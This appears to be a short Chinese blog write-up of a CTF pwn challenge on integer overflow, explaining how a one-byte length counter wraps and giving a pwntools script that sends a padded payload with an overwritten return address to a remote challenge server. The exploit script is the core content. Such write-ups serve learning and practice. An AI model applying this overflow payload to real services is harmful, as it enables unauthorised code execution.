[pwn] 10.整形溢出

阅读 143

2022-06-17


文章目录

  • ​​整形溢出原理​​
  • ​​pwn int_overflow​​

整形溢出原理

超过存储长度直接被丢弃
[pwn] 10.整形溢出_系统安全

pwn int_overflow

[pwn] 10.整形溢出_安全_02

[pwn] 10.整形溢出_安全_03

0x14+0x4+4字节返回地址+234(或者235等等,只要最后字符个数在3+256~8+256之间就可以)=262个字符,可以通过if

import pwn
flag_addr = 0x0804868B
payload = ('x'*(0x14+0x4)).encode() + \
pwn.p32(flag_addr) + ('x'*234).encode()

r = pwn.remote("220.249.52.133", 44711)
r.sendlineafter("Your choice:", "1")
r.sendlineafter("your username:", "a")
r.recvuntil("your passwd:")
r.sendline(payload)
r.interactive()

注意kali下用命令​​python3 a.py​


精彩评论(0)

0 0 举报